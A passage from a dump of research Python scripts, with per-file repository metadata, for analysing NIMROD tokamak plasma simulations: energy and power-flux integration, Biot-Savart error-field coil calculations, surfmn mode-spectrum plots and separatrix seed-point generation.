plt.colorbar()\n plt.show()\n\n def analyze_power(self,grid='close',npts=512,lphi=5,nonlin_order=2,plot=False):\n if grid == 'close':\n rmin=1.15\n rmax=2.3\n zmin=-1.25\n zmax=1.0\n elif grid == 'd3d':\n rmin=0.8\n rmax=2.5\n zmin=-1.5\n zmax=1.5\n else:\n print(f\"Grid = {grid} is not recognized\")\n raise ValueError\n #npts=128 #debug\n\n self.fields.set_method(\"powerflux\")\n self.set_3dgrid(rmin,rmax,zmin,zmax,npts,npts,lphi,nonlin_order)\n self.integrateEnergy()\n self.integratePowerFlux(plot_integrand=plot)\n volumeInt=np.ones_like(self.fields.grid.rzp[0,:,:,0])\n self.volume=self.integrateSurface(volumeInt)\n\n def analyze_power_adv(self,grid='close',npts=512,lphi=5,nonlin_order=2,plot=False):\n if grid == 'close':\n rmin=1.15\n rmax=2.3\n zmin=-1.25\n zmax=1.0\n elif grid == 'd3d':\n rmin=0.8\n rmax=2.5\n zmin=-1.5\n zmax=1.5\n else:\n print(f\"Grid = {grid} is not recognized\")\n raise ValueError\n #npts=128 #debug\n\n self.fields.set_method(\"advectPowerflux\")\n if grid ==None:\n self.set_3dgrid(rmin,rmax,zmin,zmax,npts,npts,lphi,nonlin_order)\n self.integratePowerFluxAdv(plot_integrand=plot)\n\n\n def print_integrals(self):\n for key, integral in self.energyDict.items():\n print(key, integral)\n for key, integral in self.powerDict.items():\n print(key, integral)\n print('volume ', self.volume)\n\n def clean_up(self):\n ''' Clean up fields to reduce memory foot print'''\n self.fields.clean_up()\n self.grid=None\n self.intSet=False\n self.intWeight=np.empty([1])\n\n\n###############################################################################\n# TESTING NOTES\n#############################\n# Test 1, integrate from r=1.5 to 2, z=-1,1\n# everypoint in domain, and volume is 1.75x2xpi\n# v=10.99557428756\n# test gets right answer for 30 pts to high degree\n\n# 
Test two, integrate volume from r=0.5 to 2.5, z=-1.5 to 1\n# some points are outside domain\n# pts volume\n# 30 35.1007188376975\n# 100 37.215318055511986\n# 200 37.68293725920001\n# 300 37.826641583095295\n# 500 37.96294543920083\n# 1000 38.05936996...\n# extrapolation yeilds a volume of 38.14\n# 300 pts error 0.82%\n# 500 pts error 0.46%\n# 1000 pts error 0.21% but slow\n#\n# based on these results I trust volume integral\n# 300x300 seems a good compromise between speed and accuracy\n# base on volume data\n# should verify with magnetic energy (test 3)\n\n#Test two, integrate magentic energy from r=0.5 to 2.5, z=-1.5 to 1\n# some points are outside domain, compare n=0 (excludes eq)\n# n=1 and n=5 energies, Comments these results of n=1 and\n# n=5 divide the energy by 2. But for n=/0 this should not\n# be done.\n#\n# pts E_0 E_1 E_5\n# 30 4.77153322e+02 7.88561043e+01 2.11200084e-01\n# 50 5.45079600e+02 8.14135131e+01 2.26558515e-01\n# 100 5.33019371e+02 8.25029029e+01 2.22909222e-01\n# 300 5.36869913e+02 8.26732084e+01 2.25595720e-01\n# 500 5.37585636e+02 8.27392466e+01 2.25714039e-01\n#\n# Note extrapolation for n=0,5 isn't great (R^2~.5,.6)\n# Errors of (n=0,1,5)\n# pts 30(13%,5%,7%)\n# pts 50(.6%,2%,.5%)\n# pts 100(3%,1%,2%)\n# pts 300(2%,.8%,1%\n# pts 500(2%,.7%,.9%)\n#\n# Conclusion, 100-300 points is good enought for 1% error\n" }, { "alpha_fraction": 0.4137382209300995, "alphanum_fraction": 0.6716615557670593, "avg_line_length": 34.40375518798828, "blob_id": "c519f0e6b350f2f689e46904a86ebd7256656bc7", "content_id": "cc06692e2fb7622d3a3d871f23a3233ba455f333", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7541, "license_type": "no_license", "max_line_length": 145, "num_lines": 213, "path": "/biotSavart/biotSavart.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n#\n# Input files:\n# Ouput file:\n\nimport os\nimport numpy as np\nimport sys\nimport coilClass as cc\nimport integrateBS as bs\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nhomeDir = os.environ['HOME']\nfilePath = homeDir + '/SCRATCH/174446_novac_new_eq/surfmn_scan/case_15/'\n#filePath = homeDir+ '/SCRATCH/157458/03240/19120201_rmp/'\nrzfile = filePath + 'nimrod_bdry_rz.txt'\nbaseFileName = \"brmpn\"\nfileExt = \".dat\"\n\nphiPlanes = 4 #n=0->2\nphiPlanes = 100 #plotting\nsegmentsPerCoil = 50\nbaseCurrent = 1.0\nnPert = 1\n\n\n########### begin code #########\n#nimrod RZ node locations\nnodeRZ = np.loadtxt(rzfile,comments='%',delimiter=',', skiprows=1)\n# allocate xyz and b vectors\nprint(nodeRZ.shape)\n\nnodeXYZ = np.zeros([3,nodeRZ.shape[0],phiPlanes])\nbRZPhi = np.zeros([3,nodeRZ.shape[0],phiPlanes])\nbRPhase = np.zeros(1,dtype=np.complex_)\nbZPhase = np.zeros(1,dtype=np.complex_)\nbPhiPhase = np.zeros(1,dtype=np.complex_)\n#convert node locations to xyz coordinates at multiple phi planes\nfor iPhi in range(phiPlanes):\n sinPhi = np.sin(iPhi*2.0*np.pi/phiPlanes)\n cosPhi = np.cos(iPhi*2.0*np.pi/phiPlanes)\n nodeXYZ[0,:,iPhi]=nodeRZ[:,0]*cosPhi\n nodeXYZ[1,:,iPhi]=nodeRZ[:,0]*sinPhi\n nodeXYZ[2,:,iPhi]=nodeRZ[:,1]\n\n# set up c coils\n# in the future I can move this to an function\ncoilList=[]\n#for ii in range(6):\n# thisCurrent = baseCurrent * np.cos(np.pi*(ii)*nPert/3.0)\n# thisCoil = cc.coil(thisCurrent,segmentsPerCoil)\n# coilList.append(thisCoil)\n# coilList[ii].cCoil(ii+1)\n\n# coil rmp 2 or 3\ndistance_coil = 1.2\ncoil_theta = [0, .35, .5, .65]\ncoil_tilt = [0.25, .35, 
.75, 1.1]\ncoil_tilt = [0.25, .40, .75, 1.1]\n# coils for eq 28\ncoil_theta = [0, .15, .5, .85]\ncoil_tilt = [0.25, .65, .75, 0.85]\n#delta theta\ndelta_theta=0.20\ndelta_tilt=.15\n\ncoil_theta = [0, delta_theta, .5, 1-delta_theta]\ncoil_tilt = [0.25, .5+delta_tilt, .75, 1-delta_tilt]\nscope=False\nscope=True\n\nrmag_axis=1.7682\nzmag_axis=0.0\ncoil_r = 0.6\nfor ii in range(6):\n phi = np.pi * ii/3.0\n thisCurrent = baseCurrent * np.cos(phi*nPert)\n for jj in range(4):\n theta = coil_theta[jj] * 2.0 * np.pi\n# theta = np.pi * jj/2.0\n if (jj%2 == 0):\n this_m_current = -thisCurrent\n else:\n this_m_current= thisCurrent\n\n r0 = rmag_axis + distance_coil * np.cos(theta)\n z0 = zmag_axis + distance_coil * np.sin(theta)\n x0 = r0 * np.cos(phi)\n y0 = r0 * np.sin(phi)\n tx = 0.0\n# ty = (jj+1) * np.pi/2.0\n ty = coil_tilt[jj] * 2.0 * np.pi\n tz = phi\n\n # temp set rotation angles to zero to debug\n# tx=0.0\n# ty=0.0\n# tz=0.0\n\n thisCoil = cc.coil(this_m_current,segmentsPerCoil)\n thisCoil.planarCoil(x0,y0,z0,coil_r,tx,ty,tz)\n coilList.append(thisCoil)\n\n# plot coils\nfig =plt.figure()\nax = fig.add_subplot(111,projection='3d')\nax.plot_surface(nodeXYZ[0,:,0:int(4*phiPlanes/4)], nodeXYZ[1,:,0:int(4*phiPlanes/4)], nodeXYZ[2,:,0:int(4*phiPlanes/4)],color='purple',alpha=.2) \nfor iCoil in coilList:\n# print(iCoil.xyz[2,:])\n iCoil.plot_coil(ax)\n#ax.set_xlabel('X Label')\n#ax.set_ylabel('Y Label')\n#ax.set_zlabel('Z Label')\nax.set_axis_off()\nplt.show()\n\nrd3d= [2.443303419949772, 2.445003360252620, 2.435206281190796,\n 2.397229070763543, 2.349096435450708, 2.296697511366329,\n 2.226202284287925, 2.132775562815938, 2.027583832063605,\n 1.910630360626907, 1.778445679008138, 1.635079922339590,\n 1.484330005656411, 1.324367385828326, 1.162101456042379,\n 1.027709774120046, 0.9531004737753517, 0.9291925921464999,\n 0.9306128757867301, 0.9373734199854492, 0.9374716427460326,\n 0.9309174125983126, 0.9309062023801610, 0.9330912388264760,\n 0.9290759363555934, 0.9313924528732267, 0.9325192643910063,\n 0.9298801313664510, 0.9355275529633224, 0.9383072037111380,\n 0.9315511559488159, 0.9286559025958544, 0.9465601634341064,\n 1.000382927938164, 1.092264926894742, 1.215568147385899,\n 1.343869169462016, 1.443290163237878, 1.545839461727406,\n 1.659387736523215, 1.785869422676203, 1.919004656822144,\n 2.048477467998743, 2.170484269722559, 2.273692536052303,\n 2.345258986779728, 2.405126351903085, 2.441499638224660,\n 2.444671091311594, 2.441550619712000, 2.443303419949772 ]\n\nzd3d =[0.1070010083064705, 0.2407488482372501, 0.3804810616106032,\n 0.5159387361983736, 0.6503946165564584, 0.7935848357649634,\n 0.9352181481113857, 1.059155770383247, 1.178561334034986,\n 1.293970423413222, 1.384524187526246, 1.432284507191533,\n 1.453445898862813, 1.463657741995547, 1.445934022958783,\n 1.359242878727507, 1.195323634649968, 1.004001380805289,\n 0.8237611508094629, 0.6662857938612209, 0.5291230710159969,\n 0.4026518905384536, 0.2771781125246763, 0.1533390886307173,\n 2.974376768179259E-02, -9.479066317849494E-02, -0.2219425844279092,\n -0.3553396294163588,-0.4901821828518301, -0.6351465365923717,\n -0.8027612626835731, -0.9874117999240944,-1.170409819654592,\n -1.321107993701108, -1.416381737427392, -1.457845801192058,\n -1.463452619441855, -1.457140387484942,-1.446593354617252,\n -1.427322714872727,-1.380546621923976, -1.286917884397917,\n -1.155789433396968, -1.012819480748024,-0.8474364195572380,\n -0.6613050759653780,-0.4935139420070444, -0.3285717485346793,\n 
-0.1676609207868461,-2.517907021385858E-02,0.1070010083064715 ]\n\nfig = plt.figure(figsize=(6,6))\nax = fig.add_subplot(111)\ncoilList[0].plot_2D_coil(ax,'b')\ncoilList[1].plot_2D_coil(ax,'g')\ncoilList[2].plot_2D_coil(ax,'b')\ncoilList[3].plot_2D_coil(ax,'g')\nplt.plot(rd3d,zd3d,label=\"Wall\",c='k',ls=':')\nax.set_aspect(aspect=1.0)\nax.set_xlabel('R [m]')\nax.set_ylabel('Z [m]')\nplt.title(\"Error Field Coils\")\nplt.tight_layout()\nplt.show()\nif (scope):\n sys.exit()\n\nfor iNode in range(nodeXYZ.shape[1]):\n print(\"Calculating node: \" + str(iNode))\n for iPhi in range(nodeXYZ.shape[2]):\n print(\"Calculating plane: \" + str(iPhi))\n sys.stdout.flush()\n bXYZ=np.zeros(3)\n for iCoil in coilList:\n bXYZ[:]+=bs.intCoil(iCoil,nodeXYZ[:,iNode,iPhi])\n phi = 2.0*np.pi*iPhi/phiPlanes\n### transform to bRZPhi\n# bRZPhi accounts for the negative in Bphi due to rzphi coordinates\n bRZPhi[0,iNode,iPhi] = bXYZ[0]*np.cos(phi)+bXYZ[1]*np.sin(phi)\n bRZPhi[1,iNode,iPhi] = bXYZ[2]\n bRZPhi[2,iNode,iPhi] = bXYZ[0]*np.sin(phi)-bXYZ[1]*np.cos(phi)\n\nbRPhase=np.fft.fft(bRZPhi[0,:,:],axis=1)/(float(phiPlanes))\nbZPhase=np.fft.fft(bRZPhi[1,:,:],axis=1)/(float(phiPlanes))\nbPhiPhase=np.fft.fft(bRZPhi[2,:,:],axis=1)/(float(phiPlanes))\n\n### write brmp files\nif (phiPlanes % 2 == 0): #even\n maxnphi = int(phiPlanes/2)\nelse: #odd\n maxnphi = int((phiPlanes+1)/2)\nfor ii in range (maxnphi +1):\n if ii==maxnphi:\n fac=0.5\n else:\n fac=1.0\n print(ii, maxnphi, fac)\n tempFileName = filePath + baseFileName +\"{0:0=2d}\".format(ii) + fileExt\n thisFile = open(tempFileName,'w')\n for jj in range(bRPhase.shape[0]):\n thisLine ='{: 16.16e}'.format(fac*bRPhase[jj,ii].real) + \", \"\n thisLine+='{: 16.16e}'.format(fac*bRPhase[jj,ii].imag) + \", \"\n thisLine+='{: 16.16e}'.format(fac*bZPhase[jj,ii].real) + \", \"\n thisLine+='{: 16.16e}'.format(fac*bZPhase[jj,ii].imag) + \", \"\n thisLine+='{: 16.16e}'.format(fac*bPhiPhase[jj,ii].real) + \", \"\n thisLine+='{: 16.16e}'.format(fac*bPhiPhase[jj,ii].imag) + \"\\n\"\n thisFile.write(thisLine)\n thisFile.close()\n\n#for iCoil in coilList:\n# bvec+=bs.intCoil(iCoil,np.asarray([0.0,0.0,0.0]))\n" }, { "alpha_fraction": 0.5678274631500244, "alphanum_fraction": 0.6507276296615601, "avg_line_length": 26.105634689331055, "blob_id": "6ad8f5f1a6ebf3d5ded5611de6f13c882a167c00", "content_id": "07ca23da4ac2184aecda7cdbebc7186d62107f6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3848, "license_type": "no_license", "max_line_length": 99, "num_lines": 142, "path": "/plotingScripts/surfmnPlts2.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport h5py\nimport scipy.interpolate as interp\n\n\ndef get_m_index(m, m_max):\n return m+m_max\n\nplot_type = \"nonlinear\"\nplot_type = \"ntm\"\n#vacuum,linear, nonlinear\n\n\nrun_dir = \"19092601_l5\"\n#run_dir = \"1908163\"\ndump_num = \"20000\"\nhomeDir = os.environ['HOME']\nscratchDir = homeDir + '/SCRATCH'\nfileName = scratchDir+'/174446_novac_fl/eq26/1908013/08000/surfmn.08000.h5'\nfileName = scratchDir+'/174446_novac_debug/vac_eq28_rmp/surfmn.00100.h5'\nfileName = \"/home/research/ehowell/SCRATCH/174446_novac_new_eq/surfmn_optimize/vac/surfmn.00100.h5\"\nfileName = \"/home/research/ehowell/SCRATCH/174446_novac_new_eq/surfmn_optimize/vac/surfmn.00100.h5\"\nfileName = scratchDir+'/174446_novac_fl/eq26/'+run_dir+'/'+ dump_num +'/surfmn.'+ dump_num + 
'.h5'\n\n#run_dir = \"case_15_vac\"\n#dump_num = \"00100\"\n#fileName = scratchDir+'/174446_novac_new_eq/surfmn_scan/'+run_dir+'/surfmn.'+ dump_num + '.h5'\n\n#fileName = scratchDir+'/166439/03300_vac_eq/complexconj_rmp_vac5_fpsep2/surfmn.00005.h5'\n#fileName = scratchDir+'/166439/03300_vac_eq/complexconj_rmp_vac5_fpsep2/surfmn.00005_rr.h5'\n#fileName = scratchDir+'/166439//03300_vac_eq/complexconj_rmp_vac/surfmn.00005.h5'\n\n\n#n1_scale\nplt.ylabel(r'$|B_\\psi|$ [A.U.]')\nsfac=1e4\nvmax_n1 = 90.0\nvmax_n3 = 70.0\n\nm_plot_list = [-2, 0, 2]\nq1_plot_list = [-2,-3,-4]\nq3_plot_list = [-1.67,-2.00,-2.33]\n\nprofNames = ['Vprime','q']\nwith h5py.File(fileName,'r') as fc:\n# for aname, avalue in fc.attrs.items():\n# print(aname,avalue)\n mrGrid = fc['surfmnGrid'][:]\n bmn = fc['Bmn001'][:]\n bmn3 = fc['Bmn003'][:]\n rho = fc['rho'][:]\n profs = fc['prof'][:]\n# print(fc.keys())\n \npsi_of_q = interp.interp1d(profs[1,:],rho)\nm1_range = np.linspace(-1.06,-4.5)\nq_of_m1 = psi_of_q(m1_range)\n#m3_range = np.linspace(-3.129,-15)\n#q_of_m3 = psi_of_q(m3_range/3.00)\n\nm_max = int((bmn.shape[1]-1)/2)\n#print(m_max)\n\n#print(mrGrid.shape[2])\n#print(bmn.shape)\nplt.set_cmap('nipy_spectral')\nplt.contourf(mrGrid[0,:,:],mrGrid[1,:,:],bmn*sfac,levels=300,vmax=vmax_n1)\nplt.plot(m1_range,q_of_m1,c='w')\nplt.colorbar()\n#plt.title(n1_title)\nplt.ylabel(r'<r>')\nplt.xlabel('m')\nplt.show()\n\nplt.set_cmap('nipy_spectral')\nplt.contourf(mrGrid[0,:,:],mrGrid[1,:,:],bmn3*sfac,levels=300,vmax=vmax_n3)\n#plt.plot(m3_range,q_of_m3,c='w')\n#plt.title(n3_title)\nplt.ylabel(r'<r>')\nplt.xlabel('m')\nplt.colorbar()\nplt.show()\n\n\n#plt.plot(rho,profs[0,:],label=profNames[0])\n#plt.legend()\n#plt.show()\n\n#plt.plot(rho,profs[1,:],label=profNames[1])\n#plt.legend()\n#plt.show()\n\nfig = plt.figure(figsize=(6,6))\nax= fig.add_subplot(111)\nfor this_m in m_plot_list:\n this_i = get_m_index(this_m,m_max)\n plt_lbl = \"m = \" + str(this_m)\n ax.plot(mrGrid[1,:,1],bmn[:,this_i], label=plt_lbl)\nfor this_q in q1_plot_list:\n this_rho = psi_of_q(this_q) \n this_lbl = \"q = \" + str(this_q)\n ax.axvline(this_rho,ls=':', label=this_lbl)\n\n#ax.axvline(0.607025,ls=':',c='b', label=\"q=2\")\n#ax.axvline(0.75138,ls=':',c='g', label=\"q=3\")\n#ax.axvline(0.849892,ls=':',c='c', label=\"q=4\")\n\nax.axhline(0,ls='-',c='k')\nax.legend(loc=0)\nplt.title(r'Vacuum n=1 response')\nplt.xlabel(r'<r>')\nplt.ylabel(r'$|B_\\psi|$ [A.U.]')\nplt.tight_layout()\nplt.show()\n\n\nfig = plt.figure(figsize=(6,6))\nax= fig.add_subplot(111)\nfor this_m in m_plot_list:\n this_i = get_m_index(this_m,m_max)\n plt_lbl = \"m = \" + str(this_m)\n ax.plot(mrGrid[1,:,1],bmn3[:,this_i], label=plt_lbl)\nfor this_q in q3_plot_list:\n this_rho = psi_of_q(this_q) \n this_lbl = \"q = \" + str(this_q)\n ax.axvline(this_rho,ls=':', label=this_lbl)\n\n#ax.axvline(0.607025,ls=':',c='b', label=\"q=2\")\n#ax.axvline(0.75138,ls=':',c='g', label=\"q=3\")\n#ax.axvline(0.849892,ls=':',c='c', label=\"q=4\")\n\nax.axhline(0,ls='-',c='k')\nax.legend(loc=0)\nplt.title(r'Vacuum n=3 response')\nplt.xlabel(r'<r>')\nplt.ylabel(r'$|B_\\psi|$ [A.U.]')\nplt.tight_layout()\nplt.show()" }, { "alpha_fraction": 0.5241855978965759, "alphanum_fraction": 0.552484393119812, "avg_line_length": 32.77777862548828, "blob_id": "79a3632c5f199a499430882342889043d54869b8", "content_id": "15f583b7a6ddd508080211f43c22dc5594fa8fd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3039, "license_type": "no_license", "max_line_length": 90, 
"num_lines": 90, "path": "/nimflSeed/solSeed.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' This script randomly generates a collection of seed locations basd on the sol file '''\n\n################################################################################\n# Set up envirment and import modules\n################################################################################\nimport sys\nsys.path.insert(0, \"./\")\nimport os\npwd = os.getcwd()\nhomeDir = os.environ['HOME']\nimport numpy as np\nimport random as ra\nimport matplotlib.pyplot as plt\n################################################################################\n# User defined input\n################################################################################\nsolDir = \"/SCRATCH/166439/03300_vac_eq/complexconj_rmp/\"\nsolFileName = \"sol.grn\"\nsolCon = 1 # This is the seperatrix\n\nwriteFileName = \"start_positions.dat_sep2\"\nwriteDir = \"/SCRATCH/166439/03300_vac_eq/start_pos_files/\"\n\nnPoints = 3000\nsigmaDist = 0.005\nphiZero = 0.0\nrandomPhi = True # Ture\n\n################################################################################\n# Start of code\n################################################################################\n\nfullSolFile = homeDir+solDir+solFileName\nfullWriteFile = homeDir + writeDir + writeFileName\nxyCon = [] # list of contours\nit = 0\nwith open(fullSolFile, 'r') as grnFile:\n while(True):\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n if(len(thisWords)==0): break\n if (thisWords[0] != 'x'+str(it)):\n sys.exit(\"Expecting x\" +str(it) + \" read \" + thisWords[0])\n nSep = int(thisWords[1])\n thisCon = np.zeros([nSep,2])\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n for ix, xx in enumerate(thisWords):\n thisCon[ix,0]= float(xx)\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n if (thisWords[0] != 'y'+str(it)):\n sys.exit(\"Expecting y\" +str(it) + \" read \" + thisWords[0])\n if (int(thisWords[1])!=nSep): sys.exit(\"nSep x != nSep y\")\n thisLine = grnFile.readline()\n thisWords = thisLine.split()\n for iy, yy in enumerate(thisWords):\n thisCon[iy,1]= float(yy)\n xyCon.append(thisCon)\n it+=1\n\nthisCon = xyCon[solCon]\nnCon = thisCon.shape[0]\nthisRZP = np.zeros([nPoints,3])\nfor ii in range(nPoints):\n thisIn = ra.randint(0,nCon-1)\n thisR = ra.gauss(0,sigmaDist)\n thisT = ra.uniform(0,np.pi*2.0)\n if randomPhi:\n thisPhi = ra.uniform(0,np.pi*2.0)\n else:\n thisPhi = phi0\n thisRZP[ii,0]=thisCon[thisIn,0]+thisR * np.cos(thisT)\n thisRZP[ii,1]=thisCon[thisIn,1]+thisR * np.sin(thisT)\n thisRZP[ii,2]=thisPhi\n\nfor ii, iCon in enumerate(xyCon):\n plt.scatter(iCon[:,0],iCon[:,1],s=1, label = \"Contour :\" + str(ii))\n plt.legend()\nplt.scatter(thisRZP[:,0], thisRZP[:,1],s=1)\nplt.show()\n\nwith open(fullWriteFile,'w') as thisFile:\n thisFile.write(str(nPoints)+\"\\n\")\n for jj in range(nPoints):\n thisLine = '{: 16.16e}'.format(thisRZP[jj,0]) + \", \" \n thisLine+= '{: 16.16e}'.format(thisRZP[jj,1]) + \", \" \n thisLine+= '{: 16.16e}'.format(thisRZP[jj,2]) + \"\\n\" \n thisFile.write(thisLine)" }, { "alpha_fraction": 0.5478668212890625, "alphanum_fraction": 0.5974678993225098, "avg_line_length": 35.5, "blob_id": "f2fd1b0305aeb24609c9261c04978f64732dc195", "content_id": "0da898c6d017543d0aed3aba42bc893569a1ba83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5766, "license_type": "no_license", 
"max_line_length": 132, "num_lines": 158, "path": "/surfmnNim2/surfmnClass.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport sys, getopt\nimport os\nimport xySliceClass as xy\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\nclass SurfmnClass:\n ''' Base class for surfmn calculations '''\n def __init__(self,argv):\n ''' initialize an surfmn instance with default inputs'''\n self.pd=-1\n self.mx=-1\n self.my=-1\n self.mrange=10\n self.xyFile='/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/n1_run1/orginal_exb/300000/xy_slice.bin'\n self.homeDir = os.environ['HOME']\n self.parseInput(argv)\n\n def parseInput(self,argv):\n ''' This function parses the command line input for surfmn2.py'''\n try:\n opts, args = getopt.getopt(argv,\"hs:x:y:p:m:\")\n except getopt.GetoptError:\n print('syrfmn2.py -s <xy_slice> -x <mx> -y <my> -p <pd> -m <mrange>')\n sys.exit(2)\n for opt,arg in opts:\n if opt == '-h':\n print('syrfmn2.py -s <xy_slice> -x <mx> -y <my> -p <pd> -m <mrange>')\n sys.exit(0)\n if opt == '-s':\n self.xyFile = arg\n if opt =='-x': \n self.mx = int(arg)\n if opt =='-y': \n self.my = int(arg)\n if opt =='-p': \n self.pd = int(arg)\n if opt =='-m': \n self.mrange = int(arg)\n if self.mx<0:\n sys.exit(\"specify mx with -mx\")\n if self.my<0:\n sys.exit(\"specify my with -my\")\n if self.pd<0:\n sys.exit(\"specify pd with -pd\")\n\n def calcBmn(self,xyFields):\n self.Z0 = xyFields.Z[0,0] # assumes flux aligned mesh\n self.R0 = xyFields.R[0,0]\n rMinor = np.sqrt((xyFields.R-self.R0)**2+(xyFields.Z-self.Z0)**2)\n\n #calculate length along poloidal extent of poloidal flux contour\n s=np.zeros_like(xyFields.R)\n ds=np.zeros_like(xyFields.R)\n for i in range(len(s[:,0])):\n for j in range(len(s[0,:])-1):\n ds[i,j]=math.sqrt((xyFields.R[i,j+1]-xyFields.R[i,j])**2+(xyFields.Z[i,j+1]-xyFields.Z[i,j])**2)\n s[i,j+1]=s[i,j]+ds[i,j]\n\n #calculate equilibrium poloidal field for [r,pol] locations\n self.B0P=np.sqrt(xyFields.B0R**2+xyFields.B0Z**2)\n if xyFields.J0T[0,0]>0: self.B0P=-self.B0P\n\n dqds=(-xyFields.B0T)/(2*math.pi*self.B0P*xyFields.R**2)\n q1=np.trapz(dqds,s,axis=1)\n jac=q1[:,None]*xyFields.R**3*self.B0P/(-xyFields.B0T) \n\n #calculate straight-field line theta (PEST coordinate, Jim's derivation)\n theta_str=np.zeros_like(xyFields.R)\n dtheta_str=np.zeros_like(xyFields.R)\n for i in range(len(theta_str[:,0])):\n for j in range(len(theta_str[0,:])-1):\n theta_str[i,j+1]=theta_str[i,j]+1./(q1[i]+1.0e-11)*(ds[i,j]*(-xyFields.B0T[i,j])/(self.B0P[i,j]*xyFields.R[i,j]**2))\n dtheta_str[i,j]=1./(q1[i]+1.0e-11)*(ds[i,j]*(-xyFields.B0T[i,j])/(self.B0P[i,j]*xyFields.R[i,j]**2))\n# for j in range(len(theta_str[0,:])): #ECH This shift is needed\n# theta_str[i,j]=theta_str[i,j]-theta_str[i,xyFields.pd]\n\n\n dFSAAdth=2*math.pi*jac\n FSArea=np.trapz(dFSAAdth,theta_str,axis=1)\n drhodth=2*math.pi*jac*rMinor/(FSArea[:,None]+1.0e-11)\n self.rho1=np.trapz(drhodth,theta_str,axis=1)\n# todo\n rholcfs=self.rho1[int(len(self.rho1)*.75)] # this should be ~ (1-mvac)/mx \n self.rho1=self.rho1/rholcfs\n\n for i in range(len(q1)):\n mid2=(q1[i]+2.)*(q1[i+1]+2.)\n if mid2<0:\n self.irho12=i\n mid3=(q1[i]+3.)*(q1[i+1]+3.)\n if mid3<0:\n self.irho13=i\n mid4=(q1[i]+4.)*(q1[i+1]+4.)\n if mid4<0:\n self.irho14=i\n mid5=(q1[i]+5.)*(q1[i+1]+5.)\n if mid5<0:\n self.irho15=i\n mid6=(q1[i]+6.)*(q1[i+1]+6.)\n if mid6<0:\n self.irho16=i\n mid10=(q1[i]+10.)*(q1[i+1]+10.)\n if mid10<0:\n irho110=i\n break\n\n\n mmax=self.mrange\n 
mmin=-self.mrange\n        m=np.linspace(mmin,mmax,mmax-mmin+1)\n\n# ech not sure about dim\n        #bcnm should have dim[nm,nx]\n        bcnm=np.zeros([mmax-mmin+1,xyFields.R.shape[0]])\n        bsnm=np.zeros([mmax-mmin+1,xyFields.R.shape[0]])\n\n\n        for k in range(bcnm.shape[0]): #loop over m\n            dbcnmdth=2*np.pi/(FSArea[:,None]+1e-11)*jac*(xyFields.BRr*np.cos((mmin+k)*theta_str)-xyFields.BRi*np.sin((mmin+k)*theta_str))\n            dbsnmdth=2*np.pi/(FSArea[:,None]+1e-11)*jac*(-xyFields.BRr*np.sin((mmin+k)*theta_str)-xyFields.BRi*np.cos((mmin+k)*theta_str))\n            bcnm[k,:]=np.trapz(dbcnmdth,theta_str,axis=1)\n            bsnm[k,:]=np.trapz(dbsnmdth,theta_str,axis=1)\n\n        self.bnm=np.sqrt(bcnm**2+bsnm**2)\n\n    def plotBmn(self):\n\n        fig,ax=plt.subplots(figsize=(8,6))\n        ax.plot(self.rho1,self.bnm[9,:].real,color='m',label='m=-1',lw=3)\n        ax.plot(self.rho1,self.bnm[8,:].real,color='r',label='m=-2',lw=3)\n        ax.plot(self.rho1,self.bnm[7,:].real,color='b',label='m=-3',lw=3)\n#        ax.plot(self.rho1,self.bnm[6,:].real,color='g',label='m=-4',lw=3)\n#        ax.plot(self.rho1,self.bnm[5,:].real,color='y',label='m=-5',lw=3)\n#        ax.plot(self.rho1,self.bnm[4,:].real,color='lime',label='m=-6',lw=3)\n        ax.plot(self.rho1,self.bnm[11,:].real,color='cyan',label='m=1',lw=3)\n        ax.axvline(x=self.rho1[self.irho12],lw=3,ls=(0,(3,2)),c='r',label=r'$q=-2$')\n        ax.axvline(x=self.rho1[self.irho13],lw=3,ls=(0,(3,2)),c='b',label=r'$q=-3$')\n        ax.axvline(x=self.rho1[self.irho14],lw=3,ls=(0,(3,2)),c='g',label=r'$q=-4$')\n        ax.axvline(x=self.rho1[self.irho15],lw=3,ls=(0,(3,2)),c='y',label=r'$q=-5$')\n        ax.axvline(x=self.rho1[self.irho16],lw=3,ls=(0,(3,2)),c='lime',label=r'$q=-6$')\n        \n        ax.legend(loc=1,ncol=2,fontsize=14)\n        \n        ax.yaxis.major.formatter._useMathText = True\n        ax.ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n        ax.yaxis.offsetText.set_fontsize(20)\n        ax.locator_params(axis='x',nbins=5)\n\n        plt.setp(ax.get_xticklabels(), fontsize=22)\n        plt.setp(ax.get_yticklabels(), fontsize=22)\n        \n        ax.set_xlabel(r'$<r_m>$',fontsize=24)\n        ax.set_ylabel(r'$B_m$',fontsize=24)\n        plt.show()" }, { "alpha_fraction": 0.5898028016090393, "alphanum_fraction": 0.6405002474784851, "avg_line_length": 32.85993576049805, "blob_id": "4ab2892a2c7ecc1f750bf2760957b563265beb9e", "content_id": "03ea9ef81956bc113ab8364b6a41977c7faea23c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10395, "license_type": "no_license", "max_line_length": 91, "num_lines": 307, "path": "/surfmn/surfmn_runner.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport os\nimport h5py\nimport surfmnstep\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\n\n''' This is a generic runner for surfmn. It loops over a bunch of directories\nin the current directory, searches for a surfmn file, and a dump file. If the\ndump file exists, then record the time. 